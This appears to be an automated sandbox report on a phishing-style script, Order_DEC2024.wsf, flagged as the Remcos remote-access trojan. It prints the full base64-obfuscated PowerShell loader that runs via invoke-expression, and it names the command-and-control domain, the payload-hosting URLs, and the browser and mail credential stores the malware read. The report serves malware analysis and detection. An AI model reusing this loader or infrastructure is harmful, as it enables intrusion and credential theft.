                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $maremma = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jg5lbmhvid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgfsdm9yb3rhcia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgnob3n0cmegpsakywx2b3jvdgfylkrvd25sb2fkrgf0ysgkbmvuag8poyrwzxjpz29zyw1lbnrlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcojgnob3n0cmepoyrtzxhlcm90bya9icc8pejbu0u2nf9tvefsvd4+jzskbhvwyw50zsa9icc8pejbu0u2nf9ftkq+pic7jgvuy2fyzglyid0gjhblcmlnb3nhbwvudguusw5kzxhpzigkbwv4zxjvdg8poyruaxn0bya9icrwzxjpz29zyw1lbnrllkluzgv4t2yojgx1cgfudgupoyrlbmnhcmrpciatz2ugmcatyw5kicruaxn0byatz3qgjgvuy2fyzglyoyrlbmnhcmrpciarpsakbwv4zxjvdg8utgvuz3rooyrjdw5ldgegpsakbmlzdg8glsakzw5jyxjkaxi7jgf1bgljaxntbya9icrwzxjpz29zyw1lbnrllln1ynn0cmluzygkzw5jyxjkaxisicrjdw5ldgepoyrkzwjpbgl0yw1lbnrvid0glwpvaw4gkcrhdwxpy2lzbw8uvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgf1bgljaxntby5mzw5ndggpxtskzwxlbwllaxjhid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkzgviawxpdgftzw50byk7jgxldmfkb3vyysa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgvszw1pzwlyysk7jgvzy290ysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlc2nvdgeusw52b2tlkcrudwxslcbakccwl2zoy3dvl3ivzwuuzxrzyxavlzpzchr0accsicdiawnoyw5jcm9zjywgj2jpy2hhbmnyb3mnlcanymljagfuy3jvcycsicdnu0j1awxkjywgj2jpy2hhbmnyb3mnlcanymljagfuy3jvcycsj2jpy2hhbmnyb3mnlcdiawnoyw5jcm9zjywnymljagfuy3jvcycsj2jpy2hhbmnyb3mnlcdiawnoyw5jcm9zjywnmscsj2jpy2hhbmnyb3mnksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$escumar = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($maremma));invoke-expression $escumar
                          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $maremma = 'awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07jg5lbmhvid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgfsdm9yb3rhcia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jgnob3n0cmegpsakywx2b3jvdgfylkrvd25sb2fkrgf0ysgkbmvuag8poyrwzxjpz29zyw1lbnrlid0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcojgnob3n0cmepoyrtzxhlcm90bya9icc8pejbu0u2nf9tvefsvd4+jzskbhvwyw50zsa9icc8pejbu0u2nf9ftkq+pic7jgvuy2fyzglyid0gjhblcmlnb3nhbwvudguusw5kzxhpzigkbwv4zxjvdg8poyruaxn0bya9icrwzxjpz29zyw1lbnrllkluzgv4t2yojgx1cgfudgupoyrlbmnhcmrpciatz2ugmcatyw5kicruaxn0byatz3qgjgvuy2fyzglyoyrlbmnhcmrpciarpsakbwv4zxjvdg8utgvuz3rooyrjdw5ldgegpsakbmlzdg8glsakzw5jyxjkaxi7jgf1bgljaxntbya9icrwzxjpz29zyw1lbnrllln1ynn0cmluzygkzw5jyxjkaxisicrjdw5ldgepoyrkzwjpbgl0yw1lbnrvid0glwpvaw4gkcrhdwxpy2lzbw8uvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgf1bgljaxntby5mzw5ndggpxtskzwxlbwllaxjhid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkzgviawxpdgftzw50byk7jgxldmfkb3vyysa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojgvszw1pzwlyysk7jgvzy290ysa9iftkbmxpyi5jty5ib21lxs5hzxrnzxrob2qoj1zbsscpoyrlc2nvdgeusw52b2tlkcrudwxslcbakccwl2zoy3dvl3ivzwuuzxrzyxavlzpzchr0accsicdiawnoyw5jcm9zjywgj2jpy2hhbmnyb3mnlcanymljagfuy3jvcycsicdnu0j1awxkjywgj2jpy2hhbmnyb3mnlcanymljagfuy3jvcycsj2jpy2hhbmnyb3mnlcdiawnoyw5jcm9zjywnymljagfuy3jvcycsj2jpy2hhbmnyb3mnlcdiawnoyw5jcm9zjywnmscsj2jpy2hhbmnyb3mnksk7awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07awygkcrudwxsic1uzsakufnwzxjzaw9uvgfibguglwfuzcakufnwzxjzaw9uvgfibguuufnwzxjzaw9uic1uzsakbnvsbckgeybbdm9pzf0kufnwzxjzaw9uvgfibguuufnwzxjzaw9uih0gzwxzzsb7ifdyaxrllu91dhb1dcanug93zxjtagvsbcb2zxjzaw9uie5vdcbhdmfpbgfibgunih07';$escumar = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($maremma));invoke-expression $escumarJump to behavior
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\*O~wA
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\)~
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\ck5~=A
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\*
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager/
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerp
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\v~|A
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerj
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerj~
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\;~
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6be679[/
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000001034000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerDJ\<~
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000007.00000002.4120281726.0000000001015000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                          Source: MSBuild.exe, 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, logs.dat.7.drBinary or memory string: [Program Manager]
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00433E0A cpuid 7_2_00433E0A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoA,7_2_0040E679
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,7_2_004470AE
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,7_2_004510BA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_004511E3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,7_2_004512EA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_004513B7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,7_2_00447597
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_00450A7F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,7_2_00450CF7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,7_2_00450D42
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: EnumSystemLocalesW,7_2_00450DDD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_00450E6A
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00404915 GetLocalTime,CreateEventA,CreateThread,7_2_00404915
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041A7A2 GetComputerNameExW,GetUserNameW,7_2_0041A7A2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,7_2_00448057
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0041739B GetVersionExW,8_2_0041739B
                          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000007.00000002.4122174513.0000000002A6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data7_2_0040B21B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_0040B335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: \key3.db7_2_0040B335
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: ESMTPPassword9_2_004033F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword9_2_00402DB3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword9_2_00402DB3
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7936, type: MEMORYSTR

                          Remote Access Functionality

                          barindex
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-L31JDJJump to behavior
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000007.00000002.4122174513.0000000002A6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4120281726.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7824, type: MEMORYSTR
                          Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: cmd.exe7_2_00405042
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information22
                          Scripting
                          Valid Accounts11
                          Native API
                          22
                          Scripting
                          1
                          DLL Side-Loading
                          1
                          Deobfuscate/Decode Files or Information
                          2
                          OS Credential Dumping
                          2
                          System Time Discovery
                          Remote Services11
                          Archive Collected Data
                          1
                          Web Service
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts1
                          Exploitation for Client Execution
                          1
                          DLL Side-Loading
                          1
                          Bypass User Account Control
                          3
                          Obfuscated Files or Information
                          211
                          Input Capture
                          1
                          Account Discovery
                          Remote Desktop Protocol1
                          Data from Local System
                          12
                          Ingress Tool Transfer
                          Exfiltration Over Bluetooth1
                          Defacement
                          Email AddressesDNS ServerDomain Accounts32
                          Command and Scripting Interpreter
                          1
                          Windows Service
                          1
                          Access Token Manipulation
                          1
                          DLL Side-Loading
                          2
                          Credentials in Registry
                          1
                          System Service Discovery
                          SMB/Windows Admin Shares1
                          Email Collection
                          21
                          Encrypted Channel
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts2
                          Service Execution
                          Login Hook1
                          Windows Service
                          1
                          Bypass User Account Control
                          3
                          Credentials In Files
                          3
                          File and Directory Discovery
                          Distributed Component Object Model211
                          Input Capture
                          1
                          Non-Standard Port
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts2
                          PowerShell
                          Network Logon Script522
                          Process Injection
                          1
                          Masquerading
                          LSA Secrets38
                          System Information Discovery
                          SSH3
                          Clipboard Data
                          1
                          Remote Access Software
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials31
                          Security Software Discovery
                          VNCGUI Input Capture2
                          Non-Application Layer Protocol
                          Data Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Access Token Manipulation
                          DCSync21
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal Capture113
                          Application Layer Protocol
                          Exfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job522
                          Process Injection
                          Proc Filesystem4
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568135 Sample: Order_DEC2024.wsf Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 40 paste.ee 2->40 42 lewisham1122.ddnsking.com 2->42 44 7 other IPs or domains 2->44 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 70 14 other signatures 2->70 9 wscript.exe 1 2->9         started        signatures3 68 Connects to a pastebin service (likely for C&C) 40->68 process4 dnsIp5 46 paste.ee 104.21.84.67, 443, 49730, 49731 CLOUDFLARENETUS United States 9->46 78 System process connects to network (likely due to code injection or exploit) 9->78 80 VBScript performs obfuscated calls to suspicious functions 9->80 82 Suspicious powershell command line found 9->82 84 3 other signatures 9->84 13 powershell.exe 14 16 9->13         started        signatures6 process7 signatures8 86 Writes to foreign memory regions 13->86 88 Injects a PE file into a foreign processes 13->88 16 MSBuild.exe 3 15 13->16         started        21 MSBuild.exe 13->21         started        23 conhost.exe 13->23         started        process9 dnsIp10 36 lewisham1122.ddnsking.com 160.25.73.25, 49740, 49741, 6426 GIGAINFRASoftbankBBCorpJP unknown 16->36 38 geoplugin.net 178.237.33.50, 49742, 80 ATOM86-ASATOM86NL Netherlands 16->38 34 C:\ProgramData\remcos\logs.dat, data 16->34 dropped 48 Detected Remcos RAT 16->48 50 Maps a DLL or memory area into another process 16->50 52 Installs a global keyboard hook 16->52 25 MSBuild.exe 1 16->25         started        28 MSBuild.exe 1 16->28         started        30 MSBuild.exe 2 16->30         started        32 MSBuild.exe 16->32         started        54 Contains functionality to bypass UAC (CMSTPLUA) 21->54 56 Tries to steal Mail credentials (via file registry) 21->56 58 Contains functionalty to change the wallpaper 21->58 60 5 other signatures 21->60 file11 signatures12 process13 signatures14 72 Tries to steal Instant Messenger accounts or passwords 25->72 74 Tries to steal Mail credentials (via file / registry access) 25->74 76 Tries to harvest and steal browser information (history, passwords, etc) 28->76

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          Order_DEC2024.wsf0%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          lewisham1122.ddnsking.com100%Avira URL Cloudmalware
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          bg.microsoft.map.fastly.net
                          199.232.210.172
                          truefalse
                            high
                            paste.ee
                            104.21.84.67
                            truefalse
                              high
                              lewisham1122.ddnsking.com
                              160.25.73.25
                              truetrue
                                unknown
                                geoplugin.net
                                178.237.33.50
                                truefalse
                                  high
                                  s-part-0035.t-0009.t-msedge.net
                                  13.107.246.63
                                  truefalse
                                    high
                                    fp2e7a.wpc.phicdn.net
                                    192.229.221.95
                                    truefalse
                                      high
                                      res.cloudinary.com
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://paste.ee/r/owchf/0false
                                          high
                                          lewisham1122.ddnsking.comtrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          http://geoplugin.net/json.gpfalse
                                            high
                                            https://paste.ee/d/GXRLAfalse
                                              high
                                              NameSourceMaliciousAntivirus DetectionReputation
                                              http://www.imvu.comrMSBuild.exe, 0000000B.00000002.2065327512.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                high
                                                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv59C6.tmp.8.drfalse
                                                  high
                                                  https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv59C6.tmp.8.drfalse
                                                    high
